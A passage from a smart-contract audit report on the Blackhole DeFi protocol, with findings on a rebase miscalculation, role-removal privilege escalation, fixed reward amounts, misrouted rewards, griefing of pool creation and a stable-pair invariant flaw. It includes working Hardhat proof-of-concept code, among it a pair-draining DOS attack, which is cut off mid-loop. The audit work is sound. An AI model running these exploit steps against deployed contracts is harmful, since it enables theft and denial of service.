        let currentTime = ethers.BigNumber.from((await ethers.provider.getBlock('latest')).timestamp);
        let targetTimeForUpdate = currentActivePeriod.add(WEEK);

        if (currentTime.lt(targetTimeForUpdate)) {
            const timeToAdvance = targetTimeForUpdate.sub(currentTime).toNumber();
            if (timeToAdvance > 0) {
                await network.provider.send("evm_increaseTime", [timeToAdvance]);
            }
        }
        await network.provider.send("evm_mine"); // Mine a block regardless to update timestamp
    }

    // Helper function to format BigNumbers consistently for logging
    function formatBN(bn) {
        return ethers.utils.formatUnits(bn, TOKEN_DECIMALS);
    }
    
    it("should have correct rebase when smNFTBalance is zero", async function () {
        await setupContracts();
        const lockAmount = ethers.utils.parseEther("10000");
        const lockDuration = WEEK * 52;
        await votingEscrow.connect(user1).create_lock(lockAmount, lockDuration, false /* isSMNFT */);

        await advanceToNextMintingPeriod(minter);

        const veTotal = await blackToken.balanceOf(votingEscrow.address);
        const blackTotal = await blackToken.totalSupply();
        const smNFTBalance = await votingEscrow.smNFTBalance();
        const superMassiveBonus = await votingEscrow.calculate_sm_nft_bonus(smNFTBalance);
        const weeklyEmission = await minter.weekly();

        console.log("\n--- Test Case: smNFTBalance is ZERO ---");
        console.log("  veTotal:", formatBN(veTotal));
        console.log("  blackTotal:", formatBN(blackTotal));
        console.log("  smNFTBalance:", formatBN(smNFTBalance)); // Should be 0
        console.log("  superMassiveBonus:", formatBN(superMassiveBonus)); // Should be 0
        console.log("  Weekly Mint:", formatBN(weeklyEmission));

        const rebaseContract = await minter.calculate_rebase(weeklyEmission);
        console.log("  Rebase (Contract):", formatBN(rebaseContract));

        // Corrected calculation (should match contract when smNFTBalance is 0)
        // Contract's circulatingBlack = blackTotal - veTotal - smNFTBalance
        // Corrected circulatingBlack = blackTotal - veTotal
        // Since smNFTBalance is 0, these are the same.
        const correctedCirculating = blackTotal.sub(veTotal);
        const correctedDenominator = blackTotal.add(superMassiveBonus); // bonus is 0
        
        let correctedRebase = ethers.BigNumber.from(0);
        if (!correctedDenominator.isZero() && correctedCirculating.gte(0)) {
            const numSq = correctedCirculating.mul(correctedCirculating);
            const denSqTimes2 = correctedDenominator.mul(correctedDenominator).mul(2);
            if(!denSqTimes2.isZero()) {
                correctedRebase = weeklyEmission.mul(numSq).div(denSqTimes2);
            }
        }
        console.log("  Rebase (Corrected):", formatBN(correctedRebase));
        
        expect(smNFTBalance).to.equal(0, "smNFTBalance should be zero for this test case");
        const diff = rebaseContract.sub(correctedRebase).abs();
        // Allow for extremely small dust if any fixed point math slightly differs, though should be equal
        const tolerance = ethers.utils.parseUnits("1", "wei"); 
        expect(diff).to.be.lte(tolerance, "Rebase calculations should be identical when smNFTBalance is zero");
    });

it("should demonstrate rebase miscalculation when smNFTBalance is positive", async function () {
        await setupContracts(); // Ensure fresh state for this test

        const lockAmount = ethers.utils.parseEther("10000"); 
        const smNFTLockAmount = ethers.utils.parseEther("50000"); 
        const lockDuration = WEEK * 52 * 1; 

        await votingEscrow.connect(user1).create_lock(lockAmount, lockDuration, false /* isSMNFT */);
        await votingEscrow.connect(user1).create_lock(smNFTLockAmount, lockDuration, true /* isSMNFT */);

        await advanceToNextMintingPeriod(minter);
        
        const veTotal_before = await blackToken.balanceOf(votingEscrow.address);
        const blackTotal_before = await blackToken.totalSupply(); 
        const smNFTBalance_before = await votingEscrow.smNFTBalance(); 
        const superMassiveBonus_before = await votingEscrow.calculate_sm_nft_bonus(smNFTBalance_before);
        const weeklyEmission_for_period = await minter.weekly(); 

        console.log("\n--- Test Case: smNFTBalance is POSITIVE ---");
        console.log("State BEFORE Minter.update_period / calculate_rebase (Revised Inputs):");
        console.log("  veTotal (tokens in VE for normal/perm locks):", formatBN(veTotal_before));
        console.log("  blackTotal (actual totalSupply after smNFT burn):", formatBN(blackTotal_before));
        console.log("  smNFTBalance (sum of original principals burned for smNFTs):", formatBN(smNFTBalance_before));
        console.log("  superMassiveBonus (conceptual bonus on smNFTBalance):", formatBN(superMassiveBonus_before));
        console.log("  Weekly Mint for this period (emission to be distributed):", formatBN(weeklyEmission_for_period));

        const rebaseAmount_from_contract_calc = await minter.calculate_rebase(weeklyEmission_for_period);
        console.log("Rebase Amount calculated BY CONTRACT'S LOGIC:", formatBN(rebaseAmount_from_contract_calc));

        // Corrected Logic: circulatingBlack should NOT double-subtract smNFTBalance
        const corrected_circulatingBlack = blackTotal_before.sub(veTotal_before); // Numerator: BT - VT
        // Corrected Denominator: actual total supply + conceptual bonus
        const corrected_blackSupply_denominator = blackTotal_before.add(superMassiveBonus_before); // Denominator: BT + B

        console.log("\nFor Manual/Corrected Calculation:");
        console.log("  Corrected Circulating Black (ActualCirculating):", formatBN(corrected_circulatingBlack));
        console.log("  Corrected Black Supply Denominator (ActualTotalSupply + Bonus):", formatBN(corrected_blackSupply_denominator));

        let corrected_rebaseAmount = ethers.BigNumber.from(0);
        if (!corrected_blackSupply_denominator.isZero() && corrected_circulatingBlack.gte(0)) {
            const num_squared = corrected_circulatingBlack.mul(corrected_circulatingBlack);
            const den_squared_times_2 = corrected_blackSupply_denominator.mul(corrected_blackSupply_denominator).mul(2);
            if (!den_squared_times_2.isZero()) {
                 corrected_rebaseAmount = weeklyEmission_for_period.mul(num_squared).div(den_squared_times_2);
            }
        }
        console.log("Rebase Amount calculated MANUALLY (Corrected Logic):", formatBN(corrected_rebaseAmount));
        
        const expected_misallocated_rebase = corrected_rebaseAmount.sub(rebaseAmount_from_contract_calc);
        console.log("Expected Misallocated Rebase (Corrected - Contract):", formatBN(expected_misallocated_rebase));

        // --- Assertions for Vulnerable Outcome ---
        expect(smNFTBalance_before).to.be.gt(0, "Test setup failed: smNFTBalance should be positive for this test case");
        expect(rebaseAmount_from_contract_calc).to.be.lt(corrected_rebaseAmount, "Contract's rebase should be less than corrected rebase when smNFTs exist");
        expect(expected_misallocated_rebase).to.be.gt(0, "Expected misallocated rebase amount should be greater than zero");
        
        // --- Demonstrate Upstream Impact on State ---
        const rewardsDistributor_bal_before_mint = await blackToken.balanceOf(rewardsDistributorMock.address);
        const minterTeamAddress = await minter.team();
        const team_bal_before_mint = await blackToken.balanceOf(minterTeamAddress);
        const gaugeManager_allowance_before_mint = await blackToken.allowance(minter.address, gaugeManagerMock.address);

// Calculate expected team and gauge amounts based on BOTH contract's flawed rebase AND corrected rebase
        const teamRate = await minter.teamRate();
        const MAX_BPS = await minter.MAX_BPS();

        const teamEmission_contract = weeklyEmission_for_period.mul(teamRate).div(MAX_BPS);
        const gaugeEmission_contract = weeklyEmission_for_period.sub(rebaseAmount_from_contract_calc).sub(teamEmission_contract);

        const teamEmission_corrected = weeklyEmission_for_period.mul(teamRate).div(MAX_BPS); // team emission is same
        const gaugeEmission_corrected = weeklyEmission_for_period.sub(corrected_rebaseAmount).sub(teamEmission_corrected);
        
        console.log("\n--- Predicted Distribution (based on contract's flawed rebase) ---");
        console.log("  Predicted Rebase to Distributor:", formatBN(rebaseAmount_from_contract_calc));
        console.log("  Predicted Emission to Team:", formatBN(teamEmission_contract));
        console.log("  Predicted Emission to Gauges:", formatBN(gaugeEmission_contract));
        
        console.log("\n--- Predicted Distribution (based on CORRECTED rebase) ---");
        console.log("  Predicted Rebase to Distributor (Corrected):", formatBN(corrected_rebaseAmount));
        console.log("  Predicted Emission to Team (Corrected):", formatBN(teamEmission_corrected));
        console.log("  Predicted Emission to Gauges (Corrected):", formatBN(gaugeEmission_corrected));

        // Execute the minting period update
        await minter.connect(deployer).update_period(); 
        
        const rewardsDistributor_bal_after_mint = await blackToken.balanceOf(rewardsDistributorMock.address);
        const team_bal_after_mint = await blackToken.balanceOf(minterTeamAddress);
        const gaugeManager_allowance_after_mint = await blackToken.allowance(minter.address, gaugeManagerMock.address);

        const rebase_actually_paid = rewardsDistributor_bal_after_mint.sub(rewardsDistributor_bal_before_mint);
        const team_actually_paid = team_bal_after_mint.sub(team_bal_before_mint);
        const gauge_actually_approved = gaugeManager_allowance_after_mint.sub(gaugeManager_allowance_before_mint); // Assuming allowance starts at 0 or reset

        console.log("\n--- Actual Distribution After Minter.update_period() ---");
        console.log("  Actual Rebase Paid to RewardsDistributor:", formatBN(rebase_actually_paid));
        console.log("  Actual Emission Paid to Team:", formatBN(team_actually_paid));
        console.log("  Actual Emission Approved for GaugeManager:", formatBN(gauge_actually_approved));

        // Assert that actual payments match the contract's flawed calculations
        expect(rebase_actually_paid).to.equal(rebaseAmount_from_contract_calc, "Actual rebase paid should match contract's flawed calculation");
        expect(team_actually_paid).to.equal(teamEmission_contract, "Actual team emission should match contract's calculation");
        expect(gauge_actually_approved).to.equal(gaugeEmission_contract, "Actual gauge approval should match contract's calculation");

        // Assert that gauge emission is higher than it should be
        expect(gauge_actually_approved).to.be.gt(gaugeEmission_corrected, "Gauge emission is higher than it should be due to understated rebase");
        const excessToGauges = gauge_actually_approved.sub(gaugeEmission_corrected);
        expect(excessToGauges).to.equal(expected_misallocated_rebase, "Excess to gauges should equal the rebase misallocation");
    });
});

contracts/mocks/GaugeManagerMock.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

// Corrected path: go up one level from 'mocks' to 'contracts', then into 'interfaces'
import { IBlackGovernor } from "../interfaces/IBlackGovernor.sol";

contract GaugeManagerMock {
    address public blackGovernor;
    uint256 public lastRewardAmount; // Added to observe notified amount

    function notifyRewardAmount(uint256 amount) external {
        lastRewardAmount = amount;
    }

    function getBlackGovernor() external view returns (address) {
        return blackGovernor;
    }

    function setBlackGovernor(address _gov) external { // Added for setup convenience
        blackGovernor = _gov;
    }
}

contracts/mocks/RewardsDistributorMock.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

contract RewardsDistributorMock {
    // event TokenCheckpointed(); // Optional: if you want to verify it's called

    function checkpoint_token() external {
        // emit TokenCheckpointed(); // Optional
    }
}

contracts/mocks/BlackGovernorMock.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

// Assuming IBlackGovernor.sol is in contracts/interfaces/
// Corrected path: go up one level from 'mocks' to 'contracts', then into 'interfaces'
import { IBlackGovernor } from "../interfaces/IBlackGovernor.sol"; 

contract BlackGovernorMock {
    IBlackGovernor.ProposalState public mockProposalState = IBlackGovernor.ProposalState.Pending;

    function status() external view returns (IBlackGovernor.ProposalState) {
        return mockProposalState;
    }

    // Helper to change state for testing if needed
    function setMockProposalState(IBlackGovernor.ProposalState _newState) external {
        mockProposalState = _newState;
    }
}

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from lonelybones, rayss and maxvzuvex.

[M-02] Critical access control flaw: Role removal logic incorrectly grants unauthorized roles

Submitted by rayss, also found by KineticsOfWeb3

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/PermissionsRegistry.sol#L113

Finding description

The removeRole() function incorrectly updates a user’s role list by replacing a removed role with the last role from the global_roles array. This results in unintended and unauthorized role assignments to users.

The removeRole() function correctly removes a role from the system by deleting it from the global roles list. However, when updating the users’ assigned roles arrays, the current logic mistakenly replaces the removed role with the last role from the global roles list rather than just deleting the role from the array.

When removing a role from a user’s assigned roles array (_addressToRoles[user]), the function tries to keep the array compact by replacing the role to be removed with the last element of the global_roles array. This is incorrect because it mistakenly assigns a completely unrelated role from the global roles list to the user, corrupting their role assignments.

This causes unrelated global roles to be incorrectly assigned to the user whose role is being removed.

Proof of Concept (Example)

Assume the global_roles array contains:

["GOVERNANCE", "VOTER_ADMIN", "GAUGE_ADMIN", "BRIBE_ADMIN"]

Alice has two roles:

_addressToRoles[Alice] = ["VOTER_ADMIN", "GAUGE_ADMIN"]

Calling removeRole("GAUGE_ADMIN") results in:

_addressToRoles[Alice][1] = _roles[_roles.length - 1]; // "BRIBE_ADMIN"
_addressToRoles[Alice].pop();// removes last element

Alice’s roles become:

["VOTER_ADMIN", "BRIBE_ADMIN"]

Now Alice has Alice unintentionally gains the BRIBE_ADMIN role without authorization.

Impact

• This bug leads to privilege escalation — a user can be granted a role they were never assigned, simply due to role removal logic. If roles like BRIBE_ADMIN or GAUGE_ADMIN are mistakenly granted.
• Broken access control due to corrupted role removal logic.

Severity Justification

This issue is classified as high severity because it directly compromises the integrity of the protocol’s access control system. By unintentionally assigning incorrect roles during the removal process, users may be granted powerful administrative permissions such as GAUGE_ADMIN or BRIBE_ADMIN (or any other role) without proper authorization. These roles often govern critical operations, which can influence protocol behavior.

Recommended mitigation steps

for (uint i = 0; i < atr.length; i++) {
    if (keccak256(atr[i]) == keccak256(_role)) {
        atr[i] = atr[atr.length - 1]; // Replace with last element
        atr.pop();                    // Remove last element
        break;
    }
}

The mitigation correctly updates the user’s assigned roles array (_addressToRoles[user]) without referencing the global_roles array. When removing a role, it swaps the role to be removed with the last element in the user’s own roles array and then removes (pops) the last element. This preserves the compactness and order of the array while ensuring only roles actually assigned to the user remain.

Crucially, it avoids mistakenly assigning unrelated roles from the global_roles list, preventing corruption of the user’s role data and maintaining accurate access control.

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from rayss and maxvzuvex.

The sponsor team requested that the following note be included:

This issue originates from the upstream codebase, inherited from ThenaV2 fork. Given that ThenaV2 has successfully operated at scale for several months without incident, we assess the severity of this issue as low. The implementation has been effectively battle-tested in a production environment, which significantly reduces the practical risk associated with this finding. Reference: https://github.com/ThenafiBNB/THENA-Contracts/blob/main/contracts/PermissionsRegistry.sol#L108

[M-03] 1e10 fixed farming reward in GaugeFactoryCL

Submitted by danzero

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/AlgebraCLVe33/GaugeFactoryCL.sol#L75

Finding descriptions and impact

Below is the implementation of the createEternalFarming function in GaugeFactoryCL.sol:

    function createEternalFarming(address _pool, address _algebraEternalFarming, address _rewardToken, address _bonusRewardToken) internal {
        IAlgebraPool algebraPool = IAlgebraPool(_pool);
        uint24 tickSpacing = uint24(algebraPool.tickSpacing());
        address pluginAddress = algebraPool.plugin();        
        IncentiveKey memory incentivekey = getIncentiveKey(_rewardToken, _bonusRewardToken, _pool, _algebraEternalFarming);
        uint256 remainingTimeInCurrentEpoch = BlackTimeLibrary.epochNext(block.timestamp) - block.timestamp;
        uint128 reward = 1e10;
        uint128 rewardRate = uint128(reward/remainingTimeInCurrentEpoch);
        
        IERC20(_rewardToken).safeApprove(_algebraEternalFarming, reward);
        address customDeployer = IAlgebraPoolAPIStorage(algebraPoolAPIStorage).pairToDeployer(_pool);
        IAlgebraEternalFarming.IncentiveParams memory incentiveParams = 
            IAlgebraEternalFarming.IncentiveParams(reward, 0, rewardRate, 0, tickSpacing);
        IAlgebraEternalFarmingCustom(_algebraEternalFarming).createEternalFarming(incentivekey, incentiveParams, pluginAddress, customDeployer);
    }

This function is responsible for setting up initial incentives for Algebra concentrated liquidity farms, it uses a hardcoded reward amount of 1e10 raw units. This fixed amount is then used to determine the rewardRate for the initial seeding of the Algebra farm (rewardRate = uint128(reward/remainingTimeInCurrentEpoch)).

The core issue is that 1e10 raw units represent a vastly different actual value and intended incentive level depending on the _rewardToken number of decimals:

• For an 18-decimal token: 1e10 raw units is 0.00000001 of a full token. This is typically an insignificant “dust” amount.
• For a 6-decimal token (e.g., USDC): 1e10 raw units is 10,000 full tokens ($10,000 if 1 token = $1).
• For an 8-decimal token (e.g., WBTC): 1e10 raw units is 100 full tokens ($10,000,000 if 1 token = $100,000).

This fixed raw unit amount does not adapt to the specific _rewardToken being used for the gauge. As a result, if _rewardToken is low decimal token such as USDC or WBTC the resulting rewardRate will be astronomically high which cause a huge loss for the protocol.

Recommended mitigation steps

Modify the GaugeFactoryCL.createGauge function to accept an initial reward amount parameter. This allows the caller to specify an appropriate seed amount tailored to the specific _rewardToken, its decimals, and its value.

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from maxvzuvex.

[M-04] Logic error in AVM original owner resolution

Submitted by maze, also found by maxzuvex

https://github.com/code-423n4/2025-05-blackhole/blob/main/contracts/RewardsDistributor.sol#L196-L247

Finding description

The RewardsDistributor contract contains an inconsistency in how it handles tokens managed by the Auto Voting Escrow Manager (AVM) system. In the claim() function, there’s code to check if a token is managed by AVM and, if so, to retrieve the original owner for sending rewards. However, this critical check is missing in the claim_many() function.

This creates a discrepancy in reward distribution where:

• claim() correctly sends rewards to the original owner of an AVM-managed token
• claim_many() incorrectly sends rewards to the current NFT owner (the AVM contract itself)

Relevant code from claim():

if (_locked.end < block.timestamp && !_locked.isPermanent) {
    address _nftOwner = IVotingEscrow(voting_escrow).ownerOf(_tokenId);
    if (address(avm) != address(0) && avm.tokenIdToAVMId(_tokenId) != 0) {
        _nftOwner = avm.getOriginalOwner(_tokenId);
    }
    IERC20(token).transfer(_nftOwner, amount);
}

Relevant code from claim_many():

if(_locked.end < block.timestamp && !_locked.isPermanent){
    address _nftOwner = IVotingEscrow(_voting_escrow).ownerOf(_tokenId);
    IERC20(token).transfer(_nftOwner, amount);
} else {
    IVotingEscrow(_voting_escrow).deposit_for(_tokenId, amount);
}

Impact

This inconsistency has significant impact for users who have delegated their tokens to the AVM system:

1. Users who have expired locks and whose tokens are managed by AVM will lose their rewards if claim_many() is called instead of claim().
2. The rewards will be sent to the AVM contract, which has no mechanism to forward these tokens to their rightful owners.
3. This results in permanent loss of rewards for affected users.
4. Since claim_many() is more gas efficient for claiming multiple tokens, it’s likely to be frequently used, increasing the likelihood and impact of this issue.

Recommended mitigation steps

1. Add the AVM check to the claim_many() function to match the behavior in claim():

if(_locked.end < block.timestamp && !_locked.isPermanent){
    address _nftOwner = IVotingEscrow(_voting_escrow).ownerOf(_tokenId);
    if (address(avm) != address(0) && avm.tokenIdToAVMId(_tokenId) != 0) {
        _nftOwner = avm.getOriginalOwner(_tokenId);
    }
    IERC20(token).transfer(_nftOwner, amount);
} else {
    IVotingEscrow(_voting_escrow).deposit_for(_tokenId, amount);
}

2. For better code maintainability, consider refactoring the owner resolution logic to a separate internal function:

function _getRewardRecipient(uint256 _tokenId) internal view returns (address) {
    address _nftOwner = IVotingEscrow(voting_escrow).ownerOf(_tokenId);
    if (address(avm) != address(0) && avm.tokenIdToAVMId(_tokenId) != 0) {
        _nftOwner = avm.getOriginalOwner(_tokenId);
    }
    return _nftOwner;
}

Then, use this function in both claim() and claim_many() to ensure consistent behavior.

Proof of Concept

Scenario:

1. User A delegates their tokenId #123 to the AVM system.
2. The lock for tokenId #123 expires.

3. Someone calls claim(123):

   • AVM check triggers and rewards go to User A (correct behavior)

4. Someone calls claim_many([123]):

   • No AVM check happens, rewards go to the AVM contract (incorrect behavior)
5. User A permanently loses their rewards.

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from rayss and maxvzuvex.

[M-05] Griefing attack on GenesisPoolManager.sol::depositNativeToken leading to Denial of Service

Submitted by FavourOkerri, also found by AvantGard

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/factories/GenesisPoolFactory.sol#L56-L67

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/factories/PairFactory.sol#L139-L151

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/GenesisPoolManager.sol#L100-L116

Finding description

The process of depositing native token to a Genesis Pool is vulnerable to a griefing attack, leading to a denial of service (DoS) for legitimate pool creations.

The vulnerability arises from the interaction of the following factors:

• Public information: The nativeToken and fundingToken addresses intended for a new Genesis Pool become public information when the GenesisPoolFactory.createGenesisPool transaction enters the mempool or through the GenesisCreated event it emits.
• Unrestricted pair creation: The pairFactory.createPair function allows any external actor to create a new liquidity pair for any given tokenA, tokenB, and stable combination, provided a pair for that combination doesn’t already exist.

function createPair(address tokenA, address tokenB, bool stable) external returns (address pair) {
        require(tokenA != tokenB, "IA"); // Pair: IDENTICAL_ADDRESSES
        (address token0, address token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
        require(token0 != address(0), "ZA"); // Pair: ZERO_ADDRESS
        require(getPair[token0][token1][stable] == address(0), "!ZA");
        pair = IPairGenerator(pairGenerator).createPair(token0, token1, stable);
        getPair[tokenA][tokenB][stable] = pair;
        getPair[tokenB][tokenA][stable] = pair; // Store in reverse direction
        allPairs.push(pair);
        isPair[pair] = true;

        emit PairCreated(token0, token1, stable, pair, allPairs.length);
    }

• Vulnerable validation: In GenesisPoolManager.depositNativeToken(), the protocol checks whether the pair already exists. If so, it requires that both token balances in the pair are zero — but does not verify whether the pair was created by the protocol itself.

function depositNativeToken(
        address nativeToken,
        uint256 auctionIndex,
        GenesisInfo calldata genesisPoolInfo,
        TokenAllocation calldata allocationInfo
    ) external nonReentrant returns (address genesisPool) {
        //.................code

        address pairAddress = pairFactory.getPair(nativeToken, _fundingToken, _stable);
        if (pairAddress != address(0)) {
            require(IERC20(nativeToken).balanceOf(pairAddress) == 0, "!ZV");
            require(IERC20(_fundingToken).balanceOf(pairAddress) == 0, "!ZV");
        }
       //........................more code

Attack Scenario:

An attacker can observe a pending createGenesisPool transaction (or the GenesisCreated event). The attacker can:

• Call pairFactory.createPair(nativeToken, fundingToken, stable) to create a new, empty LP pair for the target tokens.
• Immediately after, transfer a minimal non-zero amount (e.g., 1 wei) of both nativeToken and fundingToken directly to this newly created pair contract address.

Impact

When the legitimate depositNativeToken transaction executes,pairFactory.getPairwill return the attacker's pair address. The require(IERC20(token).balanceOf(pairAddress) == 0, “!ZV”);checks will then fail because the pair now holds a non-zero balance of tokens. This causes the legitimatedepositNativeToken` transaction to revert, resulting in:

• Denial of Service (DoS): Legitimate projects are repeatedly blocked from launching their intended Genesis Pools.
• Griefing: An attacker can perform this attack with minimal gas cost, making it a highly effective and low-cost method to disrupt the protocol’s core functionality.

Recommended mitigation steps

Add pair ownership or Origin validation. Instead of just checking balance == 0, validate that your protocol created the pair, or that the pair was expected.

Blackhole mitigated

Status: Unmitigated. Full details in reports from rayss, lonelybones and maxvzuvex, and also included in the Mitigation Review section below.

[M-06] First liquidity provider can DOS the pool of a stable pair

Submitted by ZZhelev, also found by cu5t0mpeo

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/Pair.sol#L481

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/Pair.sol#L344

Finding description

Rounding errors in the calculation of the invariant k can result in zero value for stable pools, allowing malicious actors to DOS the pool.

In the Pair contract, the invariant k of a stable pool is calculated as follows:

 function _k(uint x, uint y) internal view returns (uint) {
        if (stable) {
            uint _x = (x * 1e18) / decimals0;
            uint _y = (y * 1e18) / decimals1;
    @>>     uint _a = (_x * _y) / 1e18; 
            uint _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18);
            return (_a * _b) / 1e18; // x3y+y3x >= k
        } else {
            return x * y; // xy >= k
        }
    }

The value of _a = (x * y) / 1e18 becomes zero due to rounding errors when x * y < 1e18. This rounding error can result in the invariant k of stable pools equaling zero, allowing a trader to steal the remaining assets in the pool. A malicious first liquidity provider can DOS the pair by:

• Minting a small amount of liquidity to the pool.
• Stealing the remaining assets in the pool.
• Repeating steps 1 and 2 until the total supply overflows.

Impact

Pool will be DOSsed for other users to use.

Recommended mitigation steps

function mint(address to) external lock returns (uint liquidity) {
        (uint _reserve0, uint _reserve1) = (reserve0, reserve1);
        uint _balance0 = IERC20(token0).balanceOf(address(this));
        uint _balance1 = IERC20(token1).balanceOf(address(this));
        uint _amount0 = _balance0 - _reserve0;
        uint _amount1 = _balance1 - _reserve1;

        uint _totalSupply = totalSupply; // gas savings, must be defined here since totalSupply can update in _mintFee
        if (_totalSupply == 0) {
            liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY;
            _mint(address(0), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens
+           if (stable) { require(_k(_amount0, _amount1) > MINIMUM_K; }
        } else {
            liquidity = Math.min(
                (_amount0 * _totalSupply) / _reserve0,
                (_amount1 * _totalSupply) / _reserve1
            );
        }
        require(liquidity > 0, "ILM"); // Pair: INSUFFICIENT_LIQUIDITY_MINTED
        _mint(to, liquidity);

        _update(_balance0, _balance1, _reserve0, _reserve1);
        emit Mint(msg.sender, _amount0, _amount1);
    }

Proof of Concept

const { expect } = require("chai");
const { ethers } = require("hardhat");

describe("Pair Vulnerability Test (First Liquidity Provider DOS)", function () {
    let deployer, attacker;
    let MockERC20, dai, frax;
    let PairFactory, factory;
    let PairGenerator, pairGenerator; // Added PairGenerator
    let Pair; // To interact with the Pair contract instance

    const MINT_AMOUNT = ethers.BigNumber.from("10000000"); // 10_000_000 wei (as in PoC)
    const INITIAL_TOKEN_SUPPLY_FOR_ATTACKER = ethers.utils.parseEther("10000"); // 10,000 full tokens

    beforeEach(async function () {
        [deployer, attacker] = await ethers.getSigners();

        // Deploy Mock ERC20 tokens
        const MockERC20Factory = await ethers.getContractFactory("MockERC20", deployer);
        dai = await MockERC20Factory.deploy("Dai Stablecoin", "DAI", 18);
        await dai.deployed();

        frax = await MockERC20Factory.deploy("Frax Stablecoin", "FRAX", 18);
        await frax.deployed();

        // Mint tokens to attacker
        await dai.connect(deployer).mint(attacker.address, INITIAL_TOKEN_SUPPLY_FOR_ATTACKER);
        await frax.connect(deployer).mint(attacker.address, INITIAL_TOKEN_SUPPLY_FOR_ATTACKER);

        // Deploy PairGenerator
        const PairGeneratorFactory = await ethers.getContractFactory("PairGenerator", deployer);
        pairGenerator = await PairGeneratorFactory.deploy();
        await pairGenerator.deployed();

        // Deploy PairFactory
        const PairFactoryFactory = await ethers.getContractFactory("PairFactory", deployer);
        factory = await PairFactoryFactory.deploy();
        await factory.deployed();

        // Initialize PairFactory
        await factory.connect(deployer).initialize(pairGenerator.address);

        // Get Pair contract factory for later use
        Pair = await ethers.getContractFactory("Pair", deployer);
    });

    // Modified drainPair to use current balances from the pair
    async function drainPair(pairInstance, currentAttacker, token0, token1) {
        let t0, t1;
        if (token0.address.toLowerCase() < token1.address.toLowerCase()) {
            t0 = token0;
            t1 = token1;
        } else {
            t0 = token1;
            t1 = token0;
        }

        // Get current balances from the pair contract right before draining
        let currentBalanceT0InPair = await t0.balanceOf(pairInstance.address);
        let currentBalanceT1InPair = await t1.balanceOf(pairInstance.address);

        // Attacker sends 1 of token0 to the pair to facilitate the first swap
        await t0.connect(currentAttacker).transfer(pairInstance.address, 1);
        currentBalanceT0InPair = currentBalanceT0InPair.add(1); // Update local tracking

        // Attacker swaps out (current balance of token1 - 1) from the pair
        // Ensure we don't try to swap more than available or zero if balance is already 1 or less
        const amountT1ToSwapOut = currentBalanceT1InPair.gt(0) ? currentBalanceT1InPair.sub(1) : ethers.BigNumber.from(0);
        if (amountT1ToSwapOut.gt(0)) {
             await pairInstance.connect(currentAttacker).swap(0, amountT1ToSwapOut, currentAttacker.address, "0x");
        }

// Get actual balance of t0 after the first swap (it might have changed due to swap mechanics if _k was not 0)
        currentBalanceT0InPair = await t0.balanceOf(pairInstance.address);
        // Get actual balance of t1 after the first swap
        currentBalanceT1InPair = await t1.balanceOf(pairInstance.address);

        // Attacker sends 1 of token1 to the pair to facilitate the second swap
        await t1.connect(currentAttacker).transfer(pairInstance.address, 1);
        currentBalanceT1InPair = currentBalanceT1InPair.add(1); // Update local tracking
        
        // Attacker swaps out (current balance of token0 -1) from the pair to leave 1 behind
        // This is to match the PoC's final state of 1 t0 and 2 t1
        const amountT0ToSwapOut = currentBalanceT0InPair.gt(0) ? currentBalanceT0InPair.sub(1) : ethers.BigNumber.from(0);
        if (amountT0ToSwapOut.gt(0)) {
            await pairInstance.connect(currentAttacker).swap(amountT0ToSwapOut, 0, currentAttacker.address, "0x");
        }
    }

    it.only("should demonstrate the K value vulnerability leading to DOS", async function () {
        // Determine token0 and token1 based on addresses for createPair
        let tokenA, tokenB;
        if (dai.address.toLowerCase() < frax.address.toLowerCase()) {
            tokenA = dai; // token0
            tokenB = frax; // token1
        } else {
            tokenA = frax; // token0
            tokenB = dai; // token1
        }

        // Create a stable pair
        // The deployer of PairFactory is the owner and can create pairs
        const tx = await factory.connect(deployer).createPair(tokenA.address, tokenB.address, true);
        const receipt = await tx.wait();
        const pairAddress = await factory.getPair(tokenA.address, tokenB.address, true);
        expect(pairAddress).to.not.equal(ethers.constants.AddressZero, "Pair address should not be zero");

        const pair = Pair.attach(pairAddress);

        console.log(`Pair Address: ${pair.address}`);
        console.log(`Token0: ${await pair.token0()} (${tokenA.address === await pair.token0() ? await tokenA.symbol() : await tokenB.symbol()})`);
        console.log(`Token1: ${await pair.token1()} (${tokenB.address === await pair.token1() ? await tokenB.symbol() : await tokenA.symbol()})`);
        
        const numCycles = 11;
        for (let i = 0; i < numCycles; i++) {
            console.log(`\nCycle ${i + 1}/${numCycles}`);

            // Attacker transfers MINT_AMOUNT of each token to the pair
            await tokenA.connect(attacker).transfer(pair.address, MINT_AMOUNT);
            await tokenB.connect(attacker).transfer(pair.address, MINT_AMOUNT);
            console.log(`  Transferred ${MINT_AMOUNT.toString()} of ${await tokenA.symbol()} and ${await tokenB.symbol()} to pair.`);

            // Attacker mints LP tokens
            const mintTx = await pair.connect(attacker).mint(attacker.address);
            const mintReceipt = await mintTx.wait();
            // Find the Mint event to get actual minted liquidity amount (optional, for detailed logging)
            // const mintEvent = mintReceipt.events.find(e => e.event === 'Mint');
            // const mintedLP = mintEvent.args.liquidity; // This might not be the direct LP amount, depends on Pair event
            
            const lpBalance = await pair.balanceOf(attacker.address);
            const totalSupply = await pair.totalSupply();
            console.log(`  Minted LP. Attacker LP Balance: ${lpBalance.toString()}, Pair TotalSupply: ${totalSupply.toString()}`);

